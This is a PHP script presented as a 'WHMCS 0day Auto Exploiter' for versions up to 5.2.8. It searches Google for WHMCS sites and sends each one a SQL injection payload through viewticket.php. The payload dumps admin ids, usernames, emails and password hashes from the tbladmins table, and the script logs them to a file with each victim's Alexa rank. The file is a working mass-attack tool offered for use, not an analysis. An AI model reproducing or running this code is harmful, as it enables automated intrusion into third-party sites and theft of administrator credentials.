(PHP) WHMCS Exploiter 0day

1. <?php
2. /*
3. *****************************************************
4. WHMCS 0day Auto Exploiter <= 5.2.8
5. Coded by g00n - Skype: t3hg00n
6. wwww.xploiter.net
7. *****************************************************
8. Preview:
9. http://i.imgur.com/qB726Gm.png
10. In action:
11. http://i.imgur.com/oNpZAf6.png
12. http://i.imgur.com/gFlBjtD.png
13. *****************************************************
14. */
15.  
16. set_time_limit(0);
17. ini_set('memory_limit', '64M');
18. header('Content-Type: text/html; charset=UTF-8');
19. function letItBy(){ ob_flush(); flush(); }
20. function getAlexa($url)
21. {
22. $xml = simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
23. $rank1 = $xml->SD[1];
24. if($rank1)
25. $rank = $rank1->POPULARITY->attributes()->TEXT;
26. else
27. $rank = 0;
28. return $rank;
29. }
30.  
31. function google_that($query, $page=1)
32. {
33. $resultPerPage=8;
34. $start = $page*$resultPerPage;
35. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
36. $resultFromGoogle = json_decode( http_get($url, true) ,true);
37. if(isset($resultFromGoogle['responseStatus'])) {
38. if($resultFromGoogle['responseStatus'] != '200') return false;
39. if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
40. else return $resultFromGoogle['responseData']['results'];
41. }
42. else
43. die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url );
44. }
45.  
46. function http_get($url, $safemode = false){
47. if($safemode === true) sleep(1);
48. $im = curl_init($url);
49. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
50. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
51. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
52. curl_setopt($im, CURLOPT_HEADER, 0);
53. return curl_exec($im);
54. curl_close();
55. }
56.  
57. function check_vuln($url) {
58. $url = dirname($url) . '/viewticket.php';
59. $url = str_replace("/admin","",$url);
60.  
61. $post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
62. $curl_connection = curl_init($url);
63. if($curl_connection != false) {
64. curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
65. curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
66. curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
67. curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
68. curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
69. curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
70. $source = curl_exec($curl_connection);
71. preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
72. if($infoz[0]) {
73. return $infoz[0];
74. }
75. else
76. return "Fail!";
77. }
78. else
79. return "Fail!";
80. }
81. ?>
82. <html>
83. <head>
84. <title>WHMCS Auto Xploiter - by g00n</title>
85. </head>
86. <body style="background-image: url('http://i.imgur.com/zHNCk2e.gif'); background-repeat: repeat; background-position: center; background-attachment: fixed;">
87.  
88. <STYLE>
89. textarea{background-color:#105700;color:lime;font-weight:bold;font-size: 20px;font-family: Tahoma; border: 1px solid #000000;}
90. input{FONT-WEIGHT:normal;background-color: #105700;font-size: 15px;font-weight:bold;color: lime; font-family: Tahoma; border: 1px solid #666666;height:20}
91. body {
92. font-family: Tahoma
93. }
94. tr {
95. BORDER: dashed 1px #333;
96. color: #FFF;
97. }
98. td {
99. BORDER: dashed 1px #333;
100. color: #FFF;
101. }
102. .table1 {
103. BORDER: 0px Black;
104. BACKGROUND-COLOR: Black;
105. color: #FFF;
106. }
107. .td1 {
108. BORDER: 0px;
109. BORDER-COLOR: #333333;
110. font: 7pt Verdana;
111. color: Green;
112. }
113. .tr1 {
114. BORDER: 0px;
115. BORDER-COLOR: #333333;
116. color: #FFF;
117. }
118. table {
119. BORDER: dashed 1px #333;
120. BORDER-COLOR: #333333;
121. BACKGROUND-COLOR: Black;
122. color: #FFF;
123. }
124. input {
125. border : dashed 1px;
126. border-color : #333;
127. BACKGROUND-COLOR: Black;
128. font: 8pt Verdana;
129. color: Red;
130. }
131. select {
132. BORDER-RIGHT: Black 1px solid;
133. BORDER-TOP: #DF0000 1px solid;
134. BORDER-LEFT: #DF0000 1px solid;
135. BORDER-BOTTOM: Black 1px solid;
136. BORDER-color: #FFF;
137. BACKGROUND-COLOR: Black;
138. font: 8pt Verdana;
139. color: Red;
140. }
141. submit {
142. BORDER: buttonhighlight 2px outset;
143. BACKGROUND-COLOR: Black;
144. width: 30%;
145. color: #FFF;
146. }
147. textarea {
148. border : dashed 1px #333;
149. BACKGROUND-COLOR: Black;
150. font: Fixedsys bold;
151. color: #999;
152. }
153. BODY {
154. SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-color: #FFF; SCROLLBAR-SHADOW-color: #FFF; SCROLLBAR-3DLIGHT-color: #FFF; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-color: #FFF; SCROLLBAR-DARKSHADOW-color: #FFF
155. margin: 1px;
156. color: Red;
157. background-color: Black;
158. }
159. .main {
160. margin : -287px 0px 0px -490px;
161. BORDER: dashed 1px #333;
162. BORDER-COLOR: #333333;
163. }
164. .tt {
165. background-color: Black;
166. }
167.  
168. A:link {
169. COLOR: White; TEXT-DECORATION: none
170. }
171. A:visited {
172. COLOR: White; TEXT-DECORATION: none
173. }
174. A:hover {
175. color: Red; TEXT-DECORATION: none
176. }
177. A:active {
178. color: Red; TEXT-DECORATION: none
179. }
180.  
181. #result{margin:10px;}
182. #result span{display:block;}
183. #result .Y{background-color:green;}
184. #result .X{background-color:red;}
185. </STYLE>
186. <script language=\'javascript\'>
187. function hide_div(id)
188. {
189. document.getElementById(id).style.display = \'none\';
190. document.cookie=id+\'=0;\';
191. }
192. function show_div(id)
193. {
194. document.getElementById(id).style.display = \'block\';
195. document.cookie=id+\'=1;\';
196. }
197. function change_divst(id)
198. {
199. if (document.getElementById(id).style.display == \'none\')
200. show_div(id);
201. else
202. hide_div(id);
203. }
204. </script>
205. </td></table></tr>
206. <br>
207. <br>
208. <link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
209. <style>
210. body {
211. font-family: 'Audiowide', serif;
212. font-size: 30px;
213.  
214. }
215. </style>
216. </head>
217.  
218. <body onLoad="type_text()" ; bgColor=#000000 text=#00FFFF background="Fashion fuchsia">
219. <center>
220. <font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
221. <br>
222. <font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font>
223. </font>
224. <br><br>
225.  
226. <table border=1 bordercolor=red>
227. <tr>
228. <td width="700">
229. <br />
230. <center>
231. <form method="post">
232. Google Dork: &nbsp;&nbsp;
233. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurl:submitticket.php'; ?>" />
234. &nbsp;&nbsp;<input type="submit" value="Xploit!" id="button"/>
235. </form>
236. <?php
237. if(isset($_POST['dork']{0})) {
238. $file = fopen("WMCS-Hashes.txt","a");
239. echo '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';
240. letItBy();
241. for($googlePage = 1; $googlePage <= 50; $googlePage++) {
242. $googleResult = google_that($_POST['dork'], $googlePage);
243. if(!$googleResult) {
244. echo 'Finished scanning.';
245. fclose($file);
246. break;
247. }
248.  
249. for($victim = 0; $victim < sizeof($googleResult); $victim++){
250. $result = check_vuln($googleResult[$victim]['unescapedUrl']);
251. $alexa = getAlexa($googleResult[$victim]['unescapedUrl']);
252. if($result != "Fail!") {
253. $hashes = "";
254. foreach ($result as $record) {
255. $hashes = $hashes . str_replace(':::::','',$record) . "\n";
256. }
257. $sep = "========================================================\n";
258. $data = $sep . $googleResult[$victim]['unescapedUrl'] . " - Alexa: " .$alexa. "\n" . $sep . $hashes . "\n";
259. fwrite($file,$data);
260. echo "<br /><font color=\"green\">Successfully Xploited...</font>";
261. echo '<span class="Y">';
262. echo "<pre>" . $data . "</pre></span><br />";
263.  
264. }
265. else {
266. echo '<span class="X">';
267. echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - <font color=\"black\">Failed!</font>";
268. echo "</span>\n<br />";
269. }
270. letItBy();
271. }
272. }
273. echo '</div>';
274. }
275. ?>
276. </center>
277. </td>
278. </table>
279. <br /><br />
280. <font face="Audiowide" color="red" size="2">
281. Coded by: <font color="white">g00n</font> <font color="white">|</font> Skype: <font color="white"><a href="Skype:t3hg00n">t3hg00n</a></font><br /><br />
282. <br > <font color="green">For more tools/scripts/exploits/etc.</font>
283. <br />visit <a href="http://xploiter.net" target="_blank" style="text-decoration: none;">www.Xploiter.net</a>
284. </font>
285.  
286. </center>
287. </body>
288. </html>